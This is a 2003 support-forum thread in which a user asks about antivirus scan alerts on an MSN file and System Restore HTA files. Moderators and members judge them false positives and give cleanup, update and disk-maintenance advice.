suspicious and positive files found

Discussion in 'Trojan Defence Suite' started by mAw, May 8, 2003.

Thread Status:
Not open for further replies.
  1. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    FDS has found two suspicious files onmy pc.
    One in my C drive and the other in G.
    I run W98 SE on C and XP Pro on G. I have just installed XP and so have spent little time there. This is what was found:

    Scan Control Dumped @ 15:46:56 07-05-03
    Positive identification <Adv>: Possible WebDownloader
    File: c:\program files\online services\msn50\msnboot.exe

    Suspicious Filename: HTA file in suspicious location
    File: g:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp35\a0014751.hta

    It may sound silly but what should I do with these?
    I am not sure abut deleting the G file as I may alter something and as for the C one it looks like a true MSN fileo_O
    As you can tell I am not too pc savvy and need some advice.
    Thank you
     
  2. Patrice

    Patrice Registered Member

    Joined:
    Apr 15, 2003
    Posts:
    571
    Location:
    Antarctica
    Hi mAw!

    If I were you I would send the first file to DCS for further inspection. The second one is in my opinion a false-positive. So don't worry about that. Let's say your system isn't compromised or something like that, TDS-3 just found two suspicous files. The first one could be a Web-Downloader, but it could also be a false-positive. DCS will tell you!

    Best regards,

    Patrice
     
  3. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    Thank you Patrice for helping me out. Will do just that.
    Sock it to me Socrates!!
    mAw
     
  4. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    I am trying to see how to e-mail DCS. In the mean time I have scanned again with TDS-3 and it has come up with another file.
    Scan Control Dumped @ 11:32:21 08-05-03
    Positive identification <Adv>: Possible WebDownloader
    File: c:\program files\online services\msn50\msnboot.exe

    Suspicious Filename: HTA file in suspicious location
    [glow=red,2,300]TEXT[/glow]: d:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp4\a0002480.hta

    Suspicious Filename: HTA file in suspicious location
    File: g:\system volume information\_restore{d1e38ebd-7fb5-4247-8887-d3a2dce287cc}\rp35\a0014751.hta

    I think that it is probably not as innocent as we thought. Can someone please tell me exactly how to copy these files and e-mail it to you?
    I tried submit the files to TDS but as I am using a trial version I could not.
    Thanks for any help.
     
  5. Patrice

    Patrice Registered Member

    Joined:
    Apr 15, 2003
    Posts:
    571
    Location:
    Antarctica
    Hi again,

    Don't worry, those files are false-positives. They are based in the restore section of Windows. If I do a full scan of my system I got up to 60 alarms... Well, most of them are files like this one here:

    Etherreal v0.9.8.exe

    I like to save the files in that way. But for TDS-3 this is a double extension.

    Zip the suspicious file, attach it to a email and send it to this guy:

    'gavin@diamondcs.com.au'

    He's very good in analyzing suspicious files! ;) Actually I think you don't have a trojan, the file seems to be part of MSN.

    Regards,

    Patrice

    P.S. By the way, never ever panic! ;)
     
  6. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    Thank you Patrice. I am feeling more at ease with all this since your help. I have mailed files to Gavin.
    mAw
     
  7. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Hi mAw,
    welcome here.
    The msnboot is not wrong: that is a file which comes with IE installation to help you connect to internet via MSN
    The HTA files have my interest, as they are located in the restore part. So they might be rest of former infections, do you remember if your system has been infected?
    They are in the restore, the XP part, so if you scan and clean the system, disable system restore, reboot, the older restore points including those infections have gone, especially if you make a new restore point manually from the clean situation.

    Make sure you update the radius to the latest via the website http://tds.diamondcs.com.au/radius.td3
    copy that file in the TDS directory, start or reload TDS and configure your TDS to scan with all available options on and on highest sensitivity.
    If you then still find alerts, rightclick on a file and save the whole alert report to the scandump.txt which you might like to post here for review.
    If there are suspicious files --not the msnboot as that is ok-- you can zip them and send them to submit@diamondcs.com.au if it says "suspicious" , normal positive identifications are identified already and don't need review only need to get rid of them.

    To avoid new hta infections you might like to install WormGuard and for possible outbound connections control and blockage Port Explorer too.

    Let us know how it goes please!
     
  8. Andreas1

    Andreas1 Security Expert

    Joined:
    Jan 29, 2003
    Posts:
    367
    Location:
    Mainz (Ger)
    IIRC, hta files are (or at least have been when they came up and were classed as potentially dangerous) html files with some executable (macro) content.
    If you want, there is no risk in opening such a file in notepad, have a look at it and see if something looks suspicious to you. Maybe it will, maybe it won't. Just make sure that you're not *executing* the file, open your notepad (or replacement) first then go via File...Open...
    These macro thingies are stopped by Wormguard, whether they're in word/office documents, shell scripts, hta or html files or wherever, that's why Jooske pointed you to that one. Also, Wormguard inspects the macro a bit more closely and has a finer heuristical detection of what is suspicious and what is harmless behaviour by a macro.
    All the best,
    Andreas
     
  9. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    Hi Jooske: I haven't had a virus since 2002. That one was w32 BadtransB@mm. My savvy pc friend eraced my whole drive and boot sector and started fresh again with the W98. I have had the normal hang ups and nothing out of the ordinary.
    About two weeks ago I tried to defrag C and it would not. I got Webroot Spybot Search and Destroy v1.2 and swept the drive. Printed out 10 suspicious entries. I wish I could find the file to post here but cannot. Some places were like:
    DOS exploit Data source object exploit (Registry change, nothing done)
    HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004=W=3 .
    Another would be
    NewsUpdate: Typelib (Registry key, nothing done)
    HKEY_CLASS_ROOT\Typelib\{8614A941-FF72-11D0-9BA1-00AA00464A16}.
    I put them in quarrentine.
    Tried a trial version of Vopt 99 and it managed to defrag C. I realized my days were limited on tirial version so tried to defrag G drive (XP) and it said there were Structural errors on this disk. Use ScanDisk to check for errors. The reason was Err=Bad File Size.
    ScanDisk found 11 problems whick I said ignore and continue.
    Have since scanned with SD and it only found one in boot sector (...o_OI think) so I got it to repair that one.
    These could have nothing to do whatsoever with what TDS found but thought you might find a relation there.
    I will get back on track here. I did update the radius and saw that it went in Temp. Now that I am to copy them I can't see which temp they went into. I probably wouldn't recognize them anyway. Is ther a way I can search for files and folders and see them?
    PS thank you Andreas and will work my way through to your help too.
     
  10. Gavin - DiamondCS

    Gavin - DiamondCS Former DCS Moderator

    Joined:
    Feb 10, 2002
    Posts:
    2,080
    Location:
    Perth, Western Australia
    Yep, no problems with these files. The old databases would detect MSNBOOT.EXE as we had just added some generic webdownloader detection.

    If this is all TDS finds after you update the databases, you are in good shape ! Update and run a full scan as per my email :)
     
  11. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Hi again mAw,
    the radius is called radius.td3 and the few times i get it manually i drop it immediately in the TDS directory. Your download might protest for a file existing etc; you might like to d/l it to your desktop to see it and move it into the TDS directory. With a registered version this is so much easier: it backs-up the existing radius and places the new one beside it, and that backup overwrites the former bak so you won't fill the HD with all unnecessary older versions :) After it reloads itself the radius engine so no need to restart your whole TDS with all that initial scanning again, all in one daily press of the button in the menu or if configured even all that is done automatically twice a week.

    You might like to use one folder on your system named "My downloads" and point all your d/l there, maybe you even like to create different folders there for different kinds of downloads to find them back easier. Although if you go to such a folder and sort on date/time it should show on top.


    For the scandisk/defrag you might like to reboot in safe mode and do it all from there.
    It's much easier for windows, less programs active and not hindered by firewalls and av/at programs (which you should close anyway for such actions)
    In the taskmanager you might like to close everying exept the necessary systray and explorer if that helps even more.
    I always do and once in a while i put the scandisk on all advanced options and all available tests. Hope the safe mode helps you defragging!
    Not sure which is a nice defragger, we might like that kind of info in the other forums for "other software and services"
     
  12. mAw

    mAw Registered Member

    Joined:
    May 8, 2003
    Posts:
    7
    Location:
    Canada
    Hi Jooske. I did another download of the Radius and this time put it in the TDS file as Gavian suggested in his e-mail. I can't find any other file for radius fd3 on my system other than the one I put in FDS file. I must have 'run' the download and not saved it, therefore the TEMP notice. I'm sure that the registered version would be easier for me but I an not able to do that at this time.
    I appreciate your help with defragging. I did deactivate my systray but still had a prob. Will try safe mode next time and your hint to go to "other software and services".
    Certainly wish I had the knowledge to use all that is available on the TDS app. It looks like a good program. But, better to know that if I run into difficulty you people are there to help me. Thank you. :-*
     
  13. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    We all have to learn and before we know it all there is another tool to enjoy or betatest for it's technology might be integrated into TDS/WG-4.

    I said "NOT" to close the systray, that one needs to be there. In safe mode you have nothing unnecessary i suppose so no need to close more, in normal mode you'll have to close everything also from the tasdk manager and hidden things and firewalls and scanners and all the lot, and you might like to close everything in the taskmanager EXCEPT explorer and systray.

    radius.td3 is the name, not fd3. Should be located in the TDS-3 directory. FDS fileo_O? don't know that one.

    Ah you know, we buy our $1000 or 2000 or even more systems and add and keep adding hardware and whatever needed, but what is then a few tens of dollars to protect all that to the ultimate? A few less movies or burger king and it's there. We lock our $200,000 home with a doorlock of maybe $200, we just know we need some caretaking of our systems too.
    What's $50 for life long pleasure fun security and a happy family ariound? The best top notch Security in the first place, the other features we learn rather quick to be there too.
     
  14. Patrice

    Patrice Registered Member

    Joined:
    Apr 15, 2003
    Posts:
    571
    Location:
    Antarctica
    Hi mAw,

    It's me, I'm back again.
    Actually this doesn't look nice. It might be that your harddisk begins to produce bad sectors. If this really is the case, your harddisk won't make it that long. I suggest that you check your harddisk thoroughly. Use SpinRite for that:

    http://grc.com/freepopular.htm

    More information about this tool and how you should use it, you'll find here:

    http://grc.com/default.htm

    Don't forget, this is just a guess. Perhaps your harddisk is fine. But it's worth to test it. Never ever trust or rely on a harddisk... Be aware that with SpinRite you can't check NTFS partitions (if you have that installed on your XP side).

    Best regards,

    Patrice
     
  15. Andreas1

    Andreas1 Security Expert

    Joined:
    Jan 29, 2003
    Posts:
    367
    Location:
    Mainz (Ger)
    also,
    backup important data before trying to repair anything. I have recently lost a text worth several weeks of work because after some crash i had scandisk and nortons discdoctor do the rest of complete and ultimate destruction. :'(
    CU,
    Andreas
     
Thread Status:
Not open for further replies.